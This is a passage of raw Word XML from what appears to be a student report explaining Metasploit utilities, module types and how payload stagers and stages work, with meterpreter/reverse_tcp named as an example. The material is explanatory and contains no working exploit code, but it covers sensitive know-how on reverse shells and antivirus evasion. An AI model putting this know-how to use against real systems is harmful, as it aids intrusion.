          <w:p w14:paraId="7DDC7892" w14:textId="09C18364" w:rsidR="00A653F9" w:rsidRDefault="00BC6A70" w:rsidP="006053DB">
            <w:r>
              <w:t xml:space="preserve">This tool allows the user to attempt to crack sha1 hash files </w:t>
            </w:r>
            <w:r w:rsidR="002B6D01">
              <w:t xml:space="preserve">stored on a </w:t>
            </w:r>
            <w:r w:rsidR="00D42820">
              <w:t xml:space="preserve">(Hashed Message Authentication Code) </w:t>
            </w:r>
            <w:r w:rsidR="002B6D01">
              <w:t>HMAC</w:t>
            </w:r>
            <w:r w:rsidR="008C3090">
              <w:t xml:space="preserve"> that are used to store </w:t>
            </w:r>
            <w:r w:rsidR="00DA269A">
              <w:t>private cryptographic keys</w:t>
            </w:r>
            <w:r w:rsidR="00AD7DC8">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF325C" w14:paraId="2D0FE1B0" w14:textId="77777777" w:rsidTr="00AF325C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D860790" w14:textId="23C96599" w:rsidR="00AF325C" w:rsidRDefault="00E10B9F" w:rsidP="006053DB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidR="003409B6">
              <w:t>sfdb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7178" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79DCF780" w14:textId="30808BD9" w:rsidR="00AF325C" w:rsidRDefault="000F5B39" w:rsidP="006053DB">
            <w:r>
              <w:t>Interact with the MSF data base</w:t>
            </w:r>
            <w:r w:rsidR="00375290">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="008B6C0B">
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidR="00375290">
              <w:t xml:space="preserve">hich allows the user to interact with the MSF’s built in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00375290">
              <w:t>PotgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00375290">
              <w:t xml:space="preserve"> database. This </w:t>
            </w:r>
            <w:r w:rsidR="00414013">
              <w:t>can</w:t>
            </w:r>
            <w:r w:rsidR="00375290">
              <w:t xml:space="preserve"> be used by pen testers to store data from their investigations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF325C" w14:paraId="5487E66B" w14:textId="77777777" w:rsidTr="00AF325C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5551DDE6" w14:textId="779398FD" w:rsidR="00AF325C" w:rsidRDefault="007D415E" w:rsidP="006053DB">
            <w:r>
              <w:t>msf-md5_lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7178" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40BAACE7" w14:textId="54B152DD" w:rsidR="00AF325C" w:rsidRDefault="0095659E" w:rsidP="006053DB">
            <w:r>
              <w:t xml:space="preserve">This command allows the user to lookup md5 hash files against </w:t>
            </w:r>
            <w:r w:rsidR="00986BCD">
              <w:t>a database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1BE5" w14:paraId="5757DC4B" w14:textId="77777777" w:rsidTr="00AF325C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DB3114E" w14:textId="6971A340" w:rsidR="00FA1BE5" w:rsidRDefault="00E10B9F" w:rsidP="006053DB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidR="00FA1BE5">
              <w:t>sf</w:t>
            </w:r>
            <w:r w:rsidR="006E68D6">
              <w:t>rpc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7178" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49AB9AA1" w14:textId="7B96C573" w:rsidR="00FA1BE5" w:rsidRDefault="008F3C94" w:rsidP="006053DB">
            <w:r>
              <w:t>Allows the MSF to interact with the Remote Procedure Call (RPC) protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E68D6" w14:paraId="30E0B5AB" w14:textId="77777777" w:rsidTr="00AF325C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CA2A001" w14:textId="16D4024D" w:rsidR="006E68D6" w:rsidRDefault="00296E02" w:rsidP="006053DB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidR="00E7393E">
              <w:t>sf-virustotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7178" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55E0EC93" w14:textId="1CDE2E40" w:rsidR="006E68D6" w:rsidRDefault="003B2E58" w:rsidP="006053DB">
            <w:r>
              <w:t xml:space="preserve">Allows the MSF to </w:t>
            </w:r>
            <w:r w:rsidR="00335989">
              <w:t xml:space="preserve">interact with the Virus Total API </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00335989">
              <w:t>in order to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00335989">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F10EF4">
              <w:t>run virus scans on files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D8BC17B" w14:textId="77777777" w:rsidR="00440CA0" w:rsidRDefault="00440CA0" w:rsidP="006053DB"/>
    <w:p w14:paraId="6BD0A8DC" w14:textId="4BED8D3C" w:rsidR="001A7FC6" w:rsidRPr="001A7FC6" w:rsidRDefault="001A7FC6" w:rsidP="001A7FC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MSF Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB6859" w14:textId="0A042EA5" w:rsidR="00EB6577" w:rsidRDefault="00EB6577" w:rsidP="006053DB">
      <w:r>
        <w:t>The MSF has a modular framework and consists of the following modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4DC4E4" w14:textId="13B5F06C" w:rsidR="006C5AA5" w:rsidRDefault="006C5AA5" w:rsidP="006C5AA5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc150084813"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00A630D1">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00263330">
        <w:t xml:space="preserve">MSF </w:t>
      </w:r>
      <w:r>
        <w:t>Modul</w:t>
      </w:r>
      <w:r w:rsidRPr="00263330">
        <w:t>es [</w:t>
      </w:r>
      <w:r w:rsidR="00F94756">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00263330">
        <w:t>] [4]</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1751009106"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C03E32">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C03E32">
            <w:instrText xml:space="preserve"> CITATION RapBC \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C03E32">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00885C1C" w:rsidRPr="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[6]</w:t>
          </w:r>
          <w:r w:rsidR="00C03E32">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="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7745"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E23D9" w14:paraId="4BA7B313" w14:textId="77777777" w:rsidTr="00BD124C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="3B5C1641" w14:textId="76E29206" w:rsidR="001E23D9" w:rsidRPr="00BD124C" w:rsidRDefault="001E23D9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b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD124C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7745" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="56CE83EB" w14:textId="348390D2" w:rsidR="001E23D9" w:rsidRPr="00BD124C" w:rsidRDefault="001E23D9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b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD124C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E23D9" w14:paraId="56992234" w14:textId="77777777" w:rsidTr="00BD124C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B8DBE89" w14:textId="47118DB6" w:rsidR="001E23D9" w:rsidRDefault="001E23D9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 w:rsidRPr="0045772B">
              <w:t xml:space="preserve">auxiliary  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7745" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D3776C" w14:textId="4AC4A9ED" w:rsidR="001E23D9" w:rsidRDefault="007F7302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>Analysing</w:t>
            </w:r>
            <w:r w:rsidR="00444038">
              <w:t xml:space="preserve"> (Password Cracking)</w:t>
            </w:r>
            <w:r>
              <w:t>, Gathering</w:t>
            </w:r>
            <w:r w:rsidR="00B9564B">
              <w:t xml:space="preserve"> (Enumeration)</w:t>
            </w:r>
            <w:r w:rsidR="00444038">
              <w:t xml:space="preserve">, Scanning (For Vulnerabilities), Denial of Service, </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E23D9" w14:paraId="7145CC51" w14:textId="77777777" w:rsidTr="00BD124C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BC21907" w14:textId="4D899097" w:rsidR="001E23D9" w:rsidRDefault="001E23D9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 w:rsidRPr="0045772B">
              <w:t xml:space="preserve">encoders  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7745" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70471036" w14:textId="0C5381BE" w:rsidR="001E23D9" w:rsidRDefault="004E2E5B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 xml:space="preserve">Can take Raw Bytes and run </w:t>
            </w:r>
            <w:r w:rsidR="004B0AED">
              <w:t>encoding algorithms against them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E23D9" w14:paraId="5958B828" w14:textId="77777777" w:rsidTr="00BD124C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DBC446D" w14:textId="5A85518B" w:rsidR="001E23D9" w:rsidRDefault="001E23D9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 w:rsidRPr="0045772B">
              <w:t xml:space="preserve">exploits  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7745" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A99CCF5" w14:textId="0AF8AB86" w:rsidR="001E23D9" w:rsidRDefault="005B4BA5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 xml:space="preserve">These are separated into two </w:t>
            </w:r>
            <w:r w:rsidR="00BB4BC1">
              <w:t>categories</w:t>
            </w:r>
            <w:r w:rsidR="00631078">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Active and Passive</w:t>
            </w:r>
            <w:r w:rsidR="0077607C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00631078">
              <w:t>u</w:t>
            </w:r>
            <w:r w:rsidR="007934C7">
              <w:t>sed to ex</w:t>
            </w:r>
            <w:r w:rsidR="00F41865">
              <w:t>ploit vulnerabilities and execute payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E23D9" w14:paraId="63FCAA6F" w14:textId="77777777" w:rsidTr="00BD124C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B9DB89D" w14:textId="52C50614" w:rsidR="001E23D9" w:rsidRDefault="001E23D9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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0045772B">
              <w:t>nops</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0045772B">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7745" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CC02FF6" w14:textId="0DF2A45C" w:rsidR="001E23D9" w:rsidRDefault="00F41865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 xml:space="preserve">No </w:t>
            </w:r>
            <w:r w:rsidR="00707390">
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Operation</w:t>
            </w:r>
            <w:r w:rsidR="00707390">
              <w:t xml:space="preserve"> module.  Sometimes used with Buffer Overflows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E23D9" w14:paraId="7760C0BC" w14:textId="77777777" w:rsidTr="00BD124C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F235BC2" w14:textId="036F2DCA" w:rsidR="001E23D9" w:rsidRDefault="001E23D9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 w:rsidRPr="0045772B">
              <w:t>payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7745" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A56DCDE" w14:textId="177BEA17" w:rsidR="008B0E3B" w:rsidRDefault="008B0E3B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>Encapsulates the shellcode which is executed if an exploit is successful.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CFF4BAD" w14:textId="34BD372E" w:rsidR="002113F9" w:rsidRDefault="002113F9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 xml:space="preserve">Can be </w:t>
            </w:r>
            <w:r w:rsidRPr="00403E0B">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Single (Inline)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00403E0B">
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">impler </w:t>
            </w:r>
            <w:r w:rsidR="00ED4561">
              <w:t>self-contained</w:t>
            </w:r>
            <w:r w:rsidR="00C5369C">
              <w:t xml:space="preserve"> – Limitation doesn’t support all </w:t>
            </w:r>
            <w:r w:rsidR="00ED4561">
              <w:t>exploits.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02DE05B3" w14:textId="77777777" w:rsidR="00ED4561" w:rsidRDefault="00ED4561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</w:p>
          <w:p w14:paraId="7BD9D4F8" w14:textId="59FABAD3" w:rsidR="002113F9" w:rsidRDefault="005A29C7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>&lt;platform&gt;/&lt;architecture(optional)&gt;/&lt;s</w:t>
            </w:r>
            <w:r w:rsidR="001B41AE">
              <w:t>ingle&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5648727C" w14:textId="77777777" w:rsidR="001B41AE" w:rsidRDefault="001B41AE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</w:p>
          <w:p w14:paraId="111D28BE" w14:textId="7186F67C" w:rsidR="00956B82" w:rsidRDefault="00226A4C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 xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="00403E0B">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>staged</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> payloads that take the </w:t>
            </w:r>
            <w:r w:rsidR="00AC66FC">
              <w:t>format: -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F754538" w14:textId="1398CF71" w:rsidR="00226A4C" w:rsidRDefault="00526443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 xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidR="00AB7726">
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidR="003B5DDB">
              <w:t>platform</w:t>
            </w:r>
            <w:r w:rsidR="00AB7726">
              <w:t>&gt;/&lt;</w:t>
            </w:r>
            <w:r w:rsidR="003B5DDB">
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="00AB7726">
              <w:t>rchitecture</w:t>
            </w:r>
            <w:r w:rsidR="00972926">
              <w:t>(optional)</w:t>
            </w:r>
            <w:r w:rsidR="00AB7726">
              <w:t>&gt;/</w:t>
            </w:r>
            <w:r w:rsidR="003B5DDB">
              <w:t>&lt;stage&gt;/&lt;stager&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E5FF1C" w14:textId="3080518F" w:rsidR="00526443" w:rsidRDefault="00AC66FC" w:rsidP="00526443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>i.e.,</w:t>
            </w:r>
            <w:r w:rsidR="00526443">
              <w:t xml:space="preserve"> Windows/x64/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00526443">
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00526443">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00526443">
              <w:t>reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="796DCCDF" w14:textId="77777777" w:rsidR="00526443" w:rsidRDefault="00526443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</w:p>
          <w:p w14:paraId="686E3466" w14:textId="77777777" w:rsidR="00E5401B" w:rsidRDefault="00E5266E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 w:rsidRPr="00923B2E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Stager</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> = Sets up the network connection to the target</w:t>
            </w:r>
            <w:r w:rsidR="00653C96">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7725429D" w14:textId="6D88DE07" w:rsidR="00E5266E" w:rsidRDefault="00653C96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>(IP Addr</w:t>
            </w:r>
            <w:r w:rsidR="00AC66FC">
              <w:t>ess</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> &amp; Port are </w:t>
            </w:r>
            <w:r w:rsidR="00E5401B">
              <w:t>specifi</w:t>
            </w:r>
            <w:r>
              <w:t>ed in the Stager)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="362D52E1" w14:textId="0DC4FBB4" w:rsidR="00922E3A" w:rsidRDefault="00600F7B" w:rsidP="009717A4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 w:rsidRPr="00923B2E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Stage</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidR="00343B05">
              <w:t>Meterpreter</w:t>
            </w:r>
            <w:r w:rsidR="009717A4">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009717A4">
              <w:t>vncinjection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009717A4">
              <w:t xml:space="preserve"> and shell are all examples of stage</w:t>
            </w:r>
            <w:r w:rsidR="00922E3A">
              <w:t>s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A840FD9" w14:textId="71B853DA" w:rsidR="00A628B1" w:rsidRDefault="00343B05" w:rsidP="009717A4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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00922E3A">
              <w:t xml:space="preserve">A stage </w:t>
            </w:r>
            <w:r>
              <w:t>is an advanced payload</w:t>
            </w:r>
            <w:r w:rsidR="00BE2F8B">
              <w:t xml:space="preserve"> that communicates over the stager socket</w:t>
            </w:r>
            <w:r w:rsidR="006325B5">
              <w:t xml:space="preserve"> and provides a comprehensive </w:t>
            </w:r>
            <w:r w:rsidR="00AC66FC">
              <w:t>client-side</w:t>
            </w:r>
            <w:r w:rsidR="00A628B1">
              <w:t xml:space="preserve"> Application Programme Interface</w:t>
            </w:r>
            <w:r w:rsidR="006325B5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A628B1">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="006325B5">
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidR="00A628B1">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E23D9" w14:paraId="1F135AC7" w14:textId="77777777" w:rsidTr="00BD124C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="771363CD" w14:textId="4090A6D6" w:rsidR="001E23D9" w:rsidRPr="0045772B" w:rsidRDefault="001E23D9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 w:rsidRPr="0045772B">
              <w:t>post</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7745" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DE897C6" w14:textId="524765E9" w:rsidR="001E23D9" w:rsidRDefault="00305F9C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>Can be used to gather</w:t>
            </w:r>
            <w:r w:rsidR="006F21D4">
              <w:t xml:space="preserve"> and enumerate data from a session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089515F" w14:paraId="57939EAE" w14:textId="77777777" w:rsidTr="00BD124C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45F9F136" w14:textId="753AE5D0" w:rsidR="0089515F" w:rsidRPr="0045772B" w:rsidRDefault="00C9015C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>e</w:t>
            </w:r>
            <w:r w:rsidR="0089515F">
              <w:t>vasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7745" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20A791DD" w14:textId="5B007BF6" w:rsidR="0089515F" w:rsidRDefault="0089515F" w:rsidP="0045772B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</w:pPr>
            <w:r>
              <w:t xml:space="preserve">Evasive </w:t>
            </w:r>
            <w:r w:rsidR="00647078">
              <w:t>payload generator</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> attempt</w:t>
            </w:r>
            <w:r w:rsidR="00C9015C">
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidR="00647078">
              <w:t>evade detection by Anti-Virus software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1ACA3DC0" w14:textId="1BBE2F10" w:rsidR="001E23D9" w:rsidRDefault="004E521A" w:rsidP="000B4EC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Overview of Payloads</w:t>
      </w:r>
      <w:r w:rsidR="006F41C0">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stages and Stag</w:t>
      </w:r>
      <w:r w:rsidR="007A26F8">
        <w:t>ers.</w:t>
      </w:r>
      <w:r w:rsidR="00882FFE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B99209E" w14:textId="77777777" w:rsidR="001E23D9" w:rsidRDefault="001E23D9" w:rsidP="0045772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</w:p>
    <w:p w14:paraId="6F10A766" w14:textId="6883CBE7" w:rsidR="006F41C0" w:rsidRDefault="00FE0621" w:rsidP="001C68C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both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00BE3A56">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00EF7E65">
        <w:t>tagers provide the connectivity between the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00003D67">
        <w:t>’s PC</w:t>
      </w:r>
      <w:r w:rsidR="00EF7E65">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00003D67">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00EF7E65">
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00003D67">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00EF7E65">
        <w:t xml:space="preserve"> PC </w:t>
      </w:r>
      <w:r w:rsidR="00383106">
        <w:t>using the</w:t>
      </w:r>
      <w:r w:rsidR="00D43432">
        <w:t xml:space="preserve"> IP address and Port numbers</w:t>
      </w:r>
      <w:r w:rsidR="00383106">
        <w:t xml:space="preserve"> which</w:t>
      </w:r>
      <w:r w:rsidR="00D43432">
        <w:t xml:space="preserve"> are specified </w:t>
      </w:r>
      <w:r w:rsidR="004116FD">
        <w:t>during the setup of the attack</w:t>
      </w:r>
      <w:r w:rsidR="00D43432">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001F1824">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005132E4">
        <w:t xml:space="preserve"> Whil</w:t>
      </w:r>
      <w:r w:rsidR="00BE3A56">
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="005132E4">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00BE3A56">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006F41C0">
        <w:t xml:space="preserve">tages provide </w:t>
      </w:r>
      <w:r w:rsidR="00E05E74">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00BE326B">
        <w:t>client-side</w:t>
      </w:r>
      <w:r w:rsidR="00E05E74">
        <w:t xml:space="preserve"> API that allows the attacker to interact with the </w:t>
      </w:r>
      <w:r w:rsidR="00DC3585">
        <w:t xml:space="preserve">target PC.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D28961" w14:textId="77777777" w:rsidR="00D43432" w:rsidRDefault="00D43432" w:rsidP="001C68C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both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0680F8" w14:textId="46D37584" w:rsidR="00BE326B" w:rsidRPr="005132E4" w:rsidRDefault="00BE326B" w:rsidP="001C68CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005132E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Stagers can be thought of as providing connectivity on layer</w:t>
      </w:r>
      <w:r w:rsidR="003801F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005132E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 and 4 of the OSI model.</w:t>
      </w:r>
    </w:p>
